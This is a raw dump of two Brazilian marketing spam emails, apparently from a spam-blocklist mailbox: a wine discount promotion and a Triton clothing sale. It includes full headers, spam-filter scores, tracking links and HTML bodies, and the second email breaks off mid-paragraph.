List-Unsubscribe: <http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22>
X-Mailer-RecptId: 1289652
X-Mailer-SID: 22
X-Mailer-Sent-By: 1
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: 8bit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>O Melhor Vinho do mundo</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="viewport" content="width=device-width" />
<style type="text/css">
@media only screen and (max-width:480px){
body {
	margin: 0 auto !important;
	padding: 0 auto !important;
}
table[class=omvm] { width: 300px !important; background-color:#FFFFFF
!important;}
table[class=omvm] td{ width: 300px !important; float:left !important;}
br[class=delete] {display:none !important;}
td[class=delete] {display:none !important;}
td[class=logo-omvm] img{ width: 300px !important; height: 98px !important;
float:left !important;}
td[class=accroche-omvm] img{ width: 300px !important; height: 111px
!important; float:left !important;}
td[class=visuel-omvm] img{ display:none !important;}
td[class=visuel-omvm] { width: 300px !important; height: 122px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/visuel-m.jpg")!important;
background-size: 300px 122px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=visuel-omvm] a{ width: 300px !important; height: 122px !important;
display:block !important;}
td[class=texte-omvm] { width: 300px !important; height: 150px !important;
float:left !important; padding-top:15px !important; text-align:center
!important;}
td[class=btn-omvm] img{ display:none !important;}
td[class=btn-omvm] { width: 300px !important; height: 80px !important;
background-image:url("http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn-m.jpg")!important;
background-size: 300px 80px !important; background-repeat:no-repeat
!important; float:left !important;}
td[class=btn-omvm] a{ width: 300px !important; height: 80px !important;
display:block !important;}
td[class=mentions-omvm] { width: 300px !important; height: 20px !important;
float:left !important; text-align:center !important;}
}
</style>
</head>
<body bgcolor="#FFFFFF">
<center>
<table border="0" cellpadding="0" cellspacing="0"
style="width: 550px;">
<tbody>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top.jpg"
width="550" height="180" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/accroche.jpg"
width="550" height="204" border="0" alt="3 anos" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/top-text.jpg"
width="550" height="14" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/left.jpg"
width="206" height="231" border="0" alt="35% Off" /></a></td>
<td width="298" height="173" style="text-align:
center;"><span style="font-family: Arial, Helvetica, sans-serif; font-size:
17px; color: #a22943;"> Saboreie um dos australianos <br /> mais
vendidos<br /> <br /> <strong style="color: #c18520; font-size: 20px;">2010
Lindeman&rsquo;s Cawarra</strong><br /> De <strike>R$45,90</strike> por
<strong style="font-size: 40px;">29,90<sup style="font-size:
14px;">1</sup></strong></span></td>
<td rowspan="2"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/rigth.jpg"
width="46" height="231" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/btn.gif"
width="298" height="58" border="0" alt="Brinde conosco" /></a></td>
</tr>
<tr>
<td colspan="3"><a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank"> <img style="display: block;"
src="http://www.adleadevents.com.br/br/omelhorvinhodomundo/m_minisite_13022014/public/emkt/images/bottom.jpg"
width="550" height="42" border="0" alt="O Melhor Vinho do mundo"
/></a></td>
</tr>
<tr>
<td width="550" height="29" colspan="3"
style="text-align: center;"><span style="font-family: Arial, Helvetica,
sans-serif; font-size: 10px; color: #999;"> <sup>1</sup>Na compra de quatro
garrafas </span></td>
</tr>
<tr>
<td align="center" colspan="3">
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 15px 0 5px 0;">Conhe&ccedil;a nossa
<a
href="http://tru.webelapp.com/adtckcm.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br&amp;rdr=http://www.adleadevents.com.br/omelhorvinhodomundo/br/m/minisite/13022014/idp=206&amp;nome=&amp;email=vas.sl@grupotreviso.com.br"
target="_blank" style="text-decoration: underline; color:
#666666;">Pol&iacute;tica de Privacidade.</a></p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">Caso n&atilde;o queira
mais receber nossos informativos, <a
href="http://baratomail4.com.br/unsubscribe.php?M=1289652&C=c3022500f5f5b55357bb0bd5b2bd14ba&L=5&N=22"
target="_blank"><font color="#666666"><u>acesse este link</u></font></a> e
cancele sua inscri&ccedil;&atilde;o.</p>
<p style="font-family: Arial, Helvetica, sans-serif; font-size: 9px; color:
#666666; font-weight: normal; margin: 5px 0 5px 0;">2014 O Melhor Vinho do
Mundo - Todos os direitos reservados.</p>
</td>
</tr>
</tbody>
</table>
</center><img
src="http://tru.webelapp.com/adtckom.php?idc=60171&amp;idctr=6&amp;idp=206&amp;idm=377&amp;email=vas.sl@grupotreviso.com.br"
/>
<img
src="http://baratomail4.com.br/open.php?M=1289652&L=5&N=22&F=H&image=.jpg"
height="1" width="10"></body>
</html>

a other Mail is:

Return-Path: <bounce-2696-19326188-4124-248@hiperlux.com.br>
Delivered-To: root@blocklist.de
Received: by mail.blocklist.de (Postfix, from userid 1001)
	id 8D69A2F1B76; Thu, 20 Mar 2014 06:52:32 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de 8D69A2F1B76
X-Spam-Checker-Version: SpamAssassin 3.3.1 (2010-03-16) on
	server5.customer-config.de
X-Spam-Level: **
X-Spam-ASN: AS18881 186.215.224.0/19
X-Spam-Status: No, hits=2.6 required=5.5 tests=AWL=-0.625,BAYES_00=-6.1,
	FUZZY_CREDIT=1.678,HTML_IMAGE_RATIO_04=0.556,HTML_MESSAGE=0.001,
	RAZOR2_CF_RANGE_51_100=0.5,RAZOR2_CF_RANGE_E8_51_100=1.886,RAZOR2_CHECK=0.922,
	RDNS_NONE=0.793,SPF_HELO_PASS=-0.001,URIBL_BLACK=1.725,URIBL_JP_SURBL=1.25
	bayes=0.0000 relaysuntrusted=[ ip=186.215.253.93 rdns= helo=irmadulce.org.br
	by=smtp-mx.blocklist.de ident= envfrom= intl=0 id=4430BD592E593 auth= msa=0 ]
	[ ip=213.252.246.27 rdns= helo=hiper27.hiperlux.com.br by=QA-Mail ident=
	envfrom= intl=0 id= auth= msa=0 ] autolearn=disabled scanned=[Thu, 20 Mar
	2014 06:52:32 +0100] version=3.3.1
Received: from smtp-mx.blocklist.de (smtp-mx.blocklist.de [93.180.154.80])
	by mail.blocklist.de (Postfix) with ESMTP id A45362F1A6A
	for <root@blocklist.de>; Thu, 20 Mar 2014 06:52:19 +0100 (CET)
X-DKIM: OpenDKIM Filter v2.0.1 mail.blocklist.de A45362F1A6A
Received-SPF: none (hiperlux.com.br: No applicable sender policy available) receiver=smtp-mx.blocklist.de; identity=mailfrom; envelope-from="bounce-2696-19326188-4124-248@hiperlux.com.br"; helo=irmadulce.org.br; client-ip=186.215.253.93
X-DKIM: OpenDKIM Filter v2.0.1 smtp-mx.blocklist.de 4430BD592E593
Received: from irmadulce.org.br (unknown [186.215.253.93])
	by smtp-mx.blocklist.de (Postfix) with SMTP id 4430BD592E593
	for <postmaster@blocklist.de>; Thu, 20 Mar 2014 06:53:51 +0100 (CET)
X-Qamailsafe-Spam-Score: 99
X-QamailSafe-Checksum: dfb0ca8c4697d217b63e40816742068736151bac7c4c252c3ec6069092015da4
X-QamailSafe-Source-Addr: 213.252.246.27
Received: from 213.252.246.27 (EHLO hiper27.hiperlux.com.br)
  by QA-Mail Safe 7.0.14; Thu, 20 Mar 2014 00:08:14 -0300
Date: Thu, 20 Mar 2014 00:06:16 -0300
To: "valdson.santos@irmadulce.org.br" <valdson.santos@irmadulce.org.br>
From: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Reply-to: Triton - Roupas e Acessorios <Triton@hiperlux.com.br>
Subject: Presente para voce, consumidor: ate 60% off em pecas selecionadas
Message-ID: <ee5e6dfa82664ef97b3debab3faf58ca@localhost.localdomain>
X-Priority: 3
Sender: <"user-rt@info"@hiperlux.com.br>
X-Mailer: OEM
X-Complaints-To: spam-report@hiperlux.com.br
List-Unsubscribe: <http://hiperlux.com.br/media/u.php?p=s5/rs/21vc/sc/u4/rs>
X-MessageID: s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs
X-Report-Abuse: <http://hiperlux.com.br/media/report_abuse.php?mid=s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs>
X-SMTPAPI: {"unique_args":{"abuse-id":"s5-21vc-dmFsZHNvbi5zYW50b3NAaXJtYWR1bGNlLm9yZy5icg%3D%3D-sc-rt-rs"}, "category":"campaign"}
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="b1_ee5e6dfa82664ef97b3debab3faf58ca"

--b1_ee5e6dfa82664ef97b3debab3faf58ca
Content-Type: text/plain; charset = "utf-8"
Content-Transfer-Encoding: quoted-printable

Ola,=0A=0AAproveite essa chance e acesse esse email para desfrutar dos melh=
ores negocios disponiveis no mercado.=0A=0ATemos certeza que voce nao ira s=
e arrepender mas nao demore pois so valem hoje.em at=C3=A9 10x - 1 troca gr=
=C3=A1tis - Frete Gr=C3=A1tis =C3=A0 partir R$ 299=0A=0A( http://www.triton=
.com.br/?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=
=0A( http://beta.triton.com.br/feminino?utm_source=3DGet_mail&utm_medium=3D=
Disparo&utm_campaign=3D140319 )=0A( http://beta.triton.com.br/masculino?utm=
_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=0A( http://=
www.triton.com.br/hotsite/sale-triton?utm_source=3DGet_mail&utm_medium=3DDi=
sparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.br/hotsite/sale-=
triton?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D140319 )=
=0A=0A( http://www.triton.com.br/hotsite/sale-triton?utm_source=3DGet_mail&=
utm_medium=3DDisparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.b=
r/hotsite/sale-triton?url1=3Dfeminino&page=3D1#sidebar&utm_source=3DGet_mai=
l&utm_medium=3DDisparo&utm_campaign=3D140319 )=0A( http://www.triton.com.br=
/hotsite/sale-triton?url1=3Dmasculino&page=3D1&utm_source=3DGet_mail&utm_me=
dium=3DDisparo&utm_campaign=3D140319 )=0A=0A( http://www.triton.com.br/hots=
ite/sale-triton?utm_source=3DGet_mail&utm_medium=3DDisparo&utm_campaign=3D1=
40319 )=0A=0A( http://instagram.com/tritonoficial )=0A( https://www.faceboo=
k.com/tritonpage )=0A( http://www.youtube.com/tritonlovers )=0A( http://twi=
tter.com/TritonLovers )=0A=0ASEGURAN=C3=87A E PRIVACIDADE=0A=0AVoc=C3=AA re=
cebeu esta mensagem porque se cadastrou para receber=0Ae-mails da Triton. N=
=C3=B3s respeitamos a sua privacidade. Caso n=C3=A3o=0Aqueira mais receber =
mais mensagens da Triton, cancele o=0Arecebimento no link de descadastro no=
 final deste=0Ae-mail. O envio de e-mails ser=C3=A1 feito apenas com o seu=
=0Aconsentimento e poder=C3=A1 ser desativado h=C3=A1 qualquer momento. Som=
os=0Acontra o envio de e-mails sem autoriza=C3=A7=C3=A3o pr=C3=A9via (conhe=
cidos como=0ASPAM), no entanto, ap=C3=B3s requisitar o cancelamento a Trito=
n poder=C3=A1=0Alevar at=C3=A9 sete dias para processar sua solicita=C3=A7=
=C3=A3o.=0A=0AENTREGA=0A=0AComprando em nosso site, voc=C3=AA receber=C3=A1=
 os produtos de maneira=0Ar=C3=A1pida, eficiente e segura. Nosso prazo =C3=
=A9 de at=C3=A9 08 (oito) dias=0A=C3=BAteis para capitais e regi=C3=B5es me=
tropolitanas ap=C3=B3s a confirma=C3=A7=C3=A3o=0Ado pagamento. Para as dema=
is cidades, o prazo =C3=A9 de at=C3=A9 15=0A(quinze) dias =C3=BAteis. Duran=
te o processo de compra voc=C3=AA poder=C3=A1=0Acalcular a estimativa do pr=
azo de entrega que ser=C3=A1 informada. O=0Aprazo para entrega dos produtos=
 varia de acordo com o peso de=0Aproduto, local de entrega e tipo de envio.=
 O recebimento do=0Apedido pode ser realizado por terceiros, como porteiros=
 de=0Acondom=C3=ADnios e familiares, desde que assinem o comprovante de=0Ar=
ecebimento da mercadoria. S=C3=A3o realizadas tr=C3=AAs tentativas de=0Aent=
rega, em dias =C3=BAteis consecutivos. Ocorrendo tr=C3=AAs tentativas de=0A=
entrega sem sucesso o produto ser=C3=A1 devolvido ao Centro de=0ADistribui=
=C3=A7=C3=A3o da loja online. Para um novo envio o custo do frete=0A=C3=A9 =
por conta do cliente e ser=C3=A1 dado um novo prazo de entrega. Os=0Aprodut=
os ser=C3=A3o entregues de segunda a s=C3=A1bado em hor=C3=A1rio=0Acomercia=
l.=0AO frete =C3=A9 gr=C3=A1tis para pedidos acima de R$ 299,00.=0A=0APAGAM=
ENTO=0A=0AAceitamos pagamento por Boleto Banc=C3=A1rio ou por Cart=C3=A3o=
=0Ade Cr=C3=A9dito (Visa, Mastercard, Diners, Amex, Elo e Discover) em=0Aat=
=C3=A9 10x sem juros. Todas as formas de pagamento=0Atamb=C3=A9m est=C3=A3o=
 dispon=C3=ADveis no Televendas (47) 3390-5503.=0A=0ACONTATO=0A=0APara envi=
ar suas d=C3=BAvidas, sugest=C3=B5es ou coment=C3=A1rios, contate-nos=0Aatr=
aves do Telefone: (47) 3390-5503 |=0AChat: acesse aqui ( http://e2e.neoassi=
st.com/?action=3Dneolive&scr=3Drequest&th=3Dtritonnovo&ForcaAutenticar=3D1&=
UMail=3D&email=3D&name=3D&uName=3D=3D ) | Email: contato@e2e.com.br=0ANosso=
 hor=C3=A1rio de atendimento =C3=A9 de segunda =C3=A0 sexta-feira=0Adas 8 =
=C3=A0s 17h, (exceto feriados).=0A=0APRE=C3=87O=0A=0AO pre=C3=A7o dos produ=
tos podem sofrer altera=C3=A7=C3=B5es sem aviso pr=C3=A9vio.=0ACaso haja di=
verg=C3=AAncia do pre=C3=A7o da loja virtual com o da=0Anewsletter, o valor=
 a considerar ser=C3=A1 o da loja.=0A=0A( http://www.triton.com.br/ )Caso n=
ao deseje mais receber envie nos um email

--b1_ee5e6dfa82664ef97b3debab3faf58ca
Content-Type: text/html; charset = "utf-8"
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.=
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">=0A<html xmlns=3D"http://www.=
w3.org/1999/xhtml">=0A<head>=0A<meta http-equiv=3D"Content-Type" content=3D=
"text/html; charset=3DUTF-8" />=0A<title>Triton</title>=0A<style type=3D"te=
xt/css">=0A<!--=0Abody {=0A  margin-left: 0px;=0A  margin-top: 0px;=0A  mar=
gin-right: 0px;=0A  margin-bottom: 0px;=0A}=0A-->=0A</style></head>=0A=0A<b=
ody bgcolor=3D"#fff">=0A=0A<p style=3D"text-align: center;"><a href=3D"http=
://hiperlux.com.br/media/wb.php?p=3Ds5/u4/rs/21vc/sc/rs">Caso nao consiga v=
er essa mensagem acesse</a></p>=0A<table border=3D"0" cellspacing=3D"0" cel=
lpadding=3D"0" align=3D"center" style=3D"border: 1px solid #000000; width: =
600px;">=0A<tbody>=0A<tr>=0A<td height=3D"40" bgcolor=3D"#FFFFFF" style=3D"=
padding-left: 10px; border-right: solid 1px #000;"><font style=3D"font-fami=
ly: Arial, Helvetica, sans-serif; font-size: 9px; color: #000; text-transfo=
rm: uppercase;">em at&eacute; 10x - 1 troca gr&aacute;tis - Frete Gr&aacute=
;tis &agrave; partir R$ 299</font></td>=0A<td align=3D"right" bgcolor=3D"#F=
FFFFF" style=3D"padding-right: 10px;"><font style=3D"font-family: Arial, He=
lvetica, sans-serif; font-size: 9px; color: #000; text-transform: uppercase=
;"><br /><font style=3D"text-decoration: underline;"></font></font></td>=0A=
</tr>=0A</tbody>=0A</table>=0A<table border=3D"0" align=3D"center" cellpadd=
ing=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td=
><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Tri=
ton/http%3A%2F%2Fwww.triton.com.br%2F%3Futm_source%3DGet_mail%26utm_medium%=
3DDisparo%26utm_campaign%3D140319" title=3D"Triton" target=3D"_blank"><img =
src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img_02.jpg" alt=3D"Tr=
iton" width=3D"334" height=3D"91" border=3D"0" style=3D"display: block;" />=
</a></td>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs=
/21vc/sc/rs/Feminino/http%3A%2F%2Fbeta.triton.com.br%2Ffeminino%3Futm_sourc=
e%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Femin=
ino" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/=
images/img_03.jpg" alt=3D"Feminino" width=3D"99" height=3D"91" border=3D"0"=
 style=3D"display: block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com=
.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Masculino/http%3A%2F%2Fbeta.triton=
.com.br%2Fmasculino%3Futm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_ca=
mpaign%3D140319" title=3D"Masculino" target=3D"_blank"><img src=3D"http://w=
ww.e2e.com.br/E/20140318_Triton/images/img_04.jpg" alt=3D"Masculino" width=
=3D"110" height=3D"91" border=3D"0" style=3D"display: block;" /></a></td>=
=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/=
rs/Sale/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Futm_source=
%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Sale" =
target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/image=
s/img_05.jpg" alt=3D"Sale" width=3D"57" height=3D"91" border=3D"0" style=3D=
"display: block;" /></a></td>=0A</tr>=0A</tbody>=0A</table>=0A<!--conteudo-=
->=0A<table border=3D"0" cellspacing=3D"0" cellpadding=3D"0" align=3D"cente=
r" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td colspan=3D"2"><a href=3D=
"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Con=
sumidor%20-%20at%26eacute%3B%2060%25%20off/http%3A%2F%2Fwww.triton.com.br%2=
Fhotsite%2Fsale-triton%3Futm_source%3DGet_mail%26utm_medium%3DDisparo%26utm=
_campaign%3D140319" title=3D"Dia do Consumidor - at&eacute; 60% off" target=
=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140319_TritonConsumidor/i=
mages/img_02.jpg" alt=3D"Dia do Consumidor - at&eacute; 60% off" width=3D"6=
00" height=3D"194" border=3D"0" style=3D"display: block;" /></a></td>=0A</t=
r>=0A<tr>=0A<td colspan=3D"2"><a href=3D"http://hiperlux.com.br/media/tl.ph=
p?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Consumidor%20-%20at%26eacute%3B%2060%2=
5%20off/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Futm_source=
%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=3D"Dia do=
 Consumidor - at&eacute; 60% off" target=3D"_blank"><img src=3D"http://www.=
e2e.com.br/E/20140319_TritonConsumidor/images/img_03.jpg" alt=3D"Dia do Con=
sumidor - at&eacute; 60% off" width=3D"600" height=3D"182" border=3D"0" sty=
le=3D"display: block;" /></a></td>=0A</tr>=0A<tr>=0A<td><a href=3D"http://h=
iperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Feminino/http%3A%2F%2Fw=
ww.triton.com.br%2Fhotsite%2Fsale-triton%3Furl1%3Dfeminino%26page%3D1%23sid=
ebar%26utm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319=
" title=3D"Feminino" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/=
20140319_TritonConsumidor/images/img_04.jpg" alt=3D"Feminino" width=3D"173"=
 height=3D"219" border=3D"0" style=3D"display: block;" /></a></td>=0A<td><a=
 href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Mascul=
ino/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Furl1%3Dmasculi=
no%26page%3D1%26utm_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign=
%3D140319" title=3D"Masculino" target=3D"_blank"><img src=3D"http://www.e2e=
.com.br/E/20140319_TritonConsumidor/images/img_05.jpg" alt=3D"Masculino" wi=
dth=3D"427" height=3D"219" border=3D"0" style=3D"display: block;" /></a></t=
d>=0A</tr>=0A<tr>=0A<td colspan=3D"2"><a href=3D"http://hiperlux.com.br/med=
ia/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Dia%20do%20Consumidor%20-%20at%26eacute%3=
B%2060%25%20off/http%3A%2F%2Fwww.triton.com.br%2Fhotsite%2Fsale-triton%3Fut=
m_source%3DGet_mail%26utm_medium%3DDisparo%26utm_campaign%3D140319" title=
=3D"Dia do Consumidor - at&eacute; 60% off" target=3D"_blank"><img src=3D"h=
ttp://www.e2e.com.br/E/20140319_TritonConsumidor/images/img_06.jpg" alt=3D"=
Dia do Consumidor - at&eacute; 60% off" width=3D"600" height=3D"77" border=
=3D"0" style=3D"display: block;" /></a></td>=0A</tr>=0A</tbody>=0A</table>=
=0A<!--fim conteudo-->=0A<table border=3D"0" align=3D"center" cellpadding=
=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td><i=
mg style=3D"display: block;" border=3D"0" src=3D"http://www.e2e.com.br/E/20=
140318_Triton/images/img_13.jpg" width=3D"231" height=3D"64" /></td>=0A<td>=
<a href=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Inst=
agram/http%3A%2F%2Finstagram.com%2Ftritonoficial" title=3D"Instagram" targe=
t=3D"_blank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img=
_14.jpg" alt=3D"Instagram" width=3D"34" height=3D"64" border=3D"0" style=3D=
"display: block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com.br/media=
/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Facebook/https%3A%2F%2Fwww.facebook.com%2Ft=
ritonpage" title=3D"Facebook" target=3D"_blank"><img src=3D"http://www.e2e.=
com.br/E/20140318_Triton/images/img_15.jpg" alt=3D"Facebook" width=3D"35" h=
eight=3D"64" border=3D"0" style=3D"display: block;" /></a></td>=0A<td><a hr=
ef=3D"http://hiperlux.com.br/media/tl.php?p=3Ds5/u4/rs/21vc/sc/rs/Youtube/h=
ttp%3A%2F%2Fwww.youtube.com%2Ftritonlovers" title=3D"Youtube" target=3D"_bl=
ank"><img src=3D"http://www.e2e.com.br/E/20140318_Triton/images/img_16.jpg"=
 alt=3D"Youtube" width=3D"34" height=3D"64" border=3D"0" style=3D"display: =
block;" /></a></td>=0A<td><a href=3D"http://hiperlux.com.br/media/tl.php?p=
=3Ds5/u4/rs/21vc/sc/rs/Twitter/http%3A%2F%2Ftwitter.com%2FTritonLovers" tit=
le=3D"Twitter" target=3D"_blank"><img src=3D"http://www.e2e.com.br/E/201403=
18_Triton/images/img_17.jpg" alt=3D"Twitter" width=3D"36" height=3D"64" bor=
der=3D"0" style=3D"display: block;" /></a></td>=0A<td><img style=3D"display=
: block;" border=3D"0" src=3D"http://www.e2e.com.br/E/20140318_Triton/image=
s/img_18.jpg" width=3D"230" height=3D"64" /></td>=0A</tr>=0A</tbody>=0A</ta=
ble>=0A<table border=3D"0" align=3D"center" cellpadding=3D"0" cellspacing=
=3D"0" style=3D"width: 600px;">=0A<tbody>=0A<tr>=0A<td align=3D"center" bgc=
olor=3D"#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif; =
font-size: 11px; color: #503a5d;">SEGURAN&Ccedil;A E PRIVACIDADE<br /> <br =
/> <font style=3D"color: #636363;">Voc&ecirc; recebeu esta mensagem porque =
se cadastrou para receber e-mails da Triton. N&oacute;s respeitamos a sua p=
rivacidade. Caso n&atilde;o queira mais receber mais mensagens da Triton, c=
ancele o recebimento no link de descadastro no final deste<br /> e-mail. O =
envio de e-mails ser&aacute; feito apenas com o seu consentimento e poder&a=
acute; ser desativado h&aacute; qualquer momento. Somos contra o envio de e=
-mails sem autoriza&ccedil;&atilde;o pr&eacute;via (conhecidos como SPAM), =
no entanto, ap&oacute;s requisitar o cancelamento a Triton poder&aacute; le=
var at&eacute; sete dias para processar sua solicita&ccedil;&atilde;o.</fon=
t></font></td>=0A</tr>=0A</tbody>=0A</table>=0A<table border=3D"0" align=3D=
"center" cellpadding=3D"0" cellspacing=3D"0" style=3D"width: 600px;">=0A<tb=
ody>=0A<tr>=0A<td width=3D"300" align=3D"center" valign=3D"top" bgcolor=3D"=
#FFFFFF"><font style=3D"font-family: Arial, Helvetica, sans-serif; font-siz=
e: 11px; color: #503a5d;"><br /> ENTREGA<br /> <br /> <font style=3D"color:=
 #636363;">Comprando em nosso site, voc&ecirc; receber&aacute; os produtos =
de maneira r&aacute;pida, eficiente e segura. Nosso prazo &eacute; de at&ea=
cute; 08 (oito) dias &uacute;teis para capitais e regi&otilde;es metropolit=
anas ap&oacute;s a confirma&ccedil;&atilde;o do pagamento. Para as demais c=
idades, o prazo &eacute; de at&eacute; 15 (quinze) dias &uacute;teis. Duran=
te o processo de compra voc&ecirc; poder&aacute; calcular a estimativa do p=
razo de entrega que ser&aacute; informada. O prazo para entrega dos produto=
s varia de acordo com o peso de produto, local de entrega e tipo de envio. =
O recebimento do pedido pode ser realizado por terceiros, como porteiros de=
 condom&iacute;nios e familiares, desde que assinem o comprovante de recebi=
mento da mercadoria. S&atilde;o realizadas tr&ecirc;s tentativas de entrega=
, em dias &uacute;teis consecutivos. Ocorrendo tr&ecirc;s tentativas de ent=
rega sem sucesso o produto ser&aacute; devolvido ao Centro de Distribui&cce=
dil;&atilde;o da loja online. Para um novo envio o custo do frete &eacute; =
por conta do cliente e ser&aacute; dado um novo prazo de entrega. Os produt=
